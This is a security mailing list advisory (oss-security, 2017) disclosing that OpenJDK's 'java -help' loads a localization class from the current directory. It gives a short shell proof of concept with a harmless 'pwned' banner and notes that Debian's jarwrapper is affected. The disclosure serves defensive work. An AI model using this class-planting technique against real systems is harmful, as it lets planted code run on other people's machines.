oss-security - OpenJDK: java(1): untrusted search path

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <20170613152313.te53ju5sh77ptnix@jwilk.net>
Date: Tue, 13 Jun 2017 17:23:13 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: OpenJDK: java(1): untrusted search path

Running "java -help" can load code from a subdirectory of cwd:

    $ javac launcher_en.java
    $ mkdir -p sun/launcher/resources/
    $ mv launcher_en.class sun/launcher/resources/
    $ java -help
     _______
    < pwned >
     -------
            \   ^__^
             \  (oo)\_______
                (__)\       )\/\
                    ||----w |
                    ||     ||

This happens because:

* By default (i.e. when CLASSPATH env var was unset and neither -cp nor -jar 
was specified), java sets "." as the user class path:
https://docs.oracle.com/javase/8/docs/technotes/tools/findingclasses.html#userclass

* The help message is apparently supposed to be internationalized.

* The Java's localization machinery loads classes:
https://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html

On Debian systems, jarwrapper (a binfmt-misc thing for running executable jar 
files) is affected. It contains the following code:

    if java -d32 2>&1 | grep "does not support" > /dev/null; then
    ...

On 32-bit systems, this causes java to print the help message.

-- 
Jakub Wilk

View attachment "launcher_en.java" of type "text/x-java" (413 bytes)

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.